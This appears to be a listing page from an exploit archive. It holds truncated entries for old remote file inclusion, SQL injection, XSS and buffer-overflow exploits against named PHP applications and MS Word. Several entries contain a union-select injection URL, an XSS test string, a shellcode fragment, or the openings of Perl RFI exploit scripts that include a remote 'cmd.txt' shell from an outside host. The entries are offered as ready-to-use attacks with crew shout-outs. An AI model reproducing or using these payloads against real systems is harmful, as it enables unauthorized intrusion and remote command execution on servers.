Free FAQ 1.0 Index.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/20621/info Free Faq is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit of this issue allows an attacker to execute arbitrary server-side script...

SimpCMS <= 04.10.2007 (site) Remote File Inclusion Vulnerability

No description provided by source. Bug Found By Dr.RoVeR --Arab48 Hacker Contact: [email protected] --- Script: SimpCMS Light Download: http://www.simpcms.com/light/normal/simp-cms-light.zip -- Bug File: index.php Bug code in line 31: include $site..php; -- Exploit:...

maplab ms4w 2.2.1 - Remote File Inclusion Vulnerability

No description provided by source. Bug Found By ka0x D.O.M TEAM we are: anonyph;arp;ka0x;xarnuz Contact: [email protected] FROM SPAIN --- Script: MapLab Version: 2.2.1 Official Site: http://www.maptools.org Download: http://www.maptools.org/dl/ms4w/maplabms4w-2.2.1.zip -- Bug File: params.php Path...

Microsoft Word - Record Parsing Buffer Overflow (MS09-027)

Microsoft Word - Record Parsing Buffer Overflow MS09-027 MS Word Record Parsing Buffer OverflowMS-09-027 Vulnerble application MS office 2003 Tested on XP SP2 - MS Ofice 2003 v. 11.5604.5606 Bug Found By Wushi of team509 !/usr/bin/python import sys import zlib windows/exec - CMD=calc.exe shellcod...

E-Shop Shopping Cart Script - &#039;search_results.php&#039; SQL Injection

ephpscripts SQL Injection Bug Founded By Mormoroth This Portal Isnt Free Sp TNX to : imm02rtal-Magicboy-Yashi Lashi-DJ7xpl-R$p And Others www.mormoroth.net www.shabgard.org dork : Powered by ephpscripts Exploit : Site.com/path/searchresults.php?cid=-1//union//select//1,version,3,4,5,6--...

Mutiple Timesheets <= 5.0 Multiple Remote Vulnerabilities

Exploit for unknown platform in category web applications ========================================================= Mutiple Timesheets 'alert"JosS"%3B + Cookie Manipulation: Vuln File: index.php, clientinfo.php, invoices.php, smartlinks.php, todo.php Exploit:...

EasyGallery 5.0tr - Multiple Vulnerabilities

EasyGallery 5.0tr - Multiple Vulnerabilities --==+=================== Spanish Hackers Team www.spanish-hackers.com =================+==-- --==+ EasyGallery "alert"JosS + Cross Site Scripting: Vuln File: index.php Exploit: http://localhost/PATH/staticpages/easygallery/index.php?help=about&q=XSS...

Koobi CMS 4.3.0 - 4.2.3 &#40;categ&#41; Remote SQL Injection Vulnerability

JosS + Spanish Hackers Team + Sys - Project + Info: Software: Koobi CMS 4.3.0 - 4.2.3 HomePage: http://www.dream4.de/ Exploit: Remote SQL Injection High Where: index.php Bug Found By: Jose Luis Gуngora Fernбndez | JosS Contact: sys-projectathotmail.com Web: http://www.spanish-hackers.com +...

verlihub-lfi.txt

Verlihub Control Panel v 1.7 PHP 4.x Local File Inclusion http://vhcp.verlihub- project.org/ Bug Found By Methodman From TEAMELITE dchub.nemesis.te-home.net:4120 Bug: Line: 27 - iniset"magicquotesgpc","1"; ............................ Line: 71 - $pagename = isset$GET'page' ? $GET'page' :...

PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit

Exploit for unknown platform in category web applications ================================================================= PostNuke Module phgstats 0.5 phgdir Remote File Include Exploit ================================================================= PostNuke Module phgstats 0.5 phgdir Remote...

NetDNS0.3.txt

ToXiC NetDNS: Remote File Inclusion by ToXiC CreW ToXic Security Italian CreW BuG FounD by Drago84 Application Affect: NetDNS-0.03 Sorce Code: http://gentoo.osuosl.org/distfiles/NetDNS-0.03.tgz Page: RR.php Dir : /DNS/ Problem: / Include files / requireonce"$phpdnsbasedir/DNS/RR/A.php";...

Mdweb132-postgres.txt

ToXiC Mdweb132-postgres: Remote File Inclusion by ToXiC CreW ToXic Security Italian CreW BuG FounD by Drago84 Application Affect: Mdweb132-postgres Sorce Code: http://jc.desconnets.free.fr/mdweb/install/windows/mdweb132-postgres-s ans-installeur.zip Page: formorg.inc.php countryinsert.php Problem...

Jaws 0.5.2 - &#039;/include/JawsDB.php&#039; Remote File Inclusion

ToXiC Jaws 0.5.2: Remote File Inclusion by ToXiC CreW ToXic Security Italian CreW BuG FounD by Drago84 Application Affect: jaws 0.5.2 Sorce Code: http://forge.novell.com/modules/xfcontent/private.php/jaws/jaws-0.5.2/jaws-0.5.2.tar.gz Page: JawsDB.php Problem: GLOBALS"path" not Declare Dir :...

phpQuiz v0.01 design and coding byJule Slootbeek &#40;pagename&#41; Remote File Inclusion

SolpotCrew Community phpQuiz v0.01 design and coding byJule Slootbeek pagename Remote File Inclusion Download file : http://www.furor-normannicus.de/phpQuiz/download/phpQuiz.zip Bug Found By :Solpot a.k.a k. Hasibuan 14-09-2006 contact: [email protected] Website :...

FlashBB 1.1.8 - &#039;phpbb_root_path&#039; Remote File Inclusion

!/usr/bin/perl TUFaT FlashBB perl flashBB.pl http://target.com/flashbb http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; Contact: h4ntu [email protected] use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// ||...

VWar 1.5.0 R12 Remote File Inclusion Exploit

Exploit for unknown platform in category web applications ============================================ VWar 1.5.0 R12 Remote File Inclusion Exploit ============================================ !/usr/bin/perl VWar perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd cmd shell example: cm...

SQuery 4.5 - libpath Remote File Inclusion

SQuery 4.5 - libpath Remote File Inclusion !/usr/bin/perl SQuery perl squery.pl http://site.com/SQuery/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! special shout to...

PHPNuke-Clan 3.0.1 (vwar_root2) Remote File Inclusion Exploit

Exploit for unknown platform in category web applications ============================================================= PHPNuke-Clan 3.0.1 vwarroot2 Remote File Inclusion Exploit ============================================================= !/usr/bin/perl PHPNuke-Clan 3.0.1 Remote File Inclusion...

KnowledgebasePublisher 1.2 (include) Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl KnowledgebasePublisher 1.2 Remote Code Execution Exploit Bug Found By uid0 c 2006 ExploiterCode.com usage: perl knowledgebase.pl location of KnowledgebasePublisher cmd shell location cmd shell variable perl knowledgebase.pl...

KnowledgebasePublisher 1.2 - &#039;Include&#039; Remote Code Execution

!/usr/bin/perl KnowledgebasePublisher 1.2 Remote Code Execution Exploit Bug Found By uid0 c 2006 ExploiterCode.com usage: perl knowledgebase.pl perl knowledgebase.pl http://site.com/knowledgebase/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; hai to: nex, kutmaster,...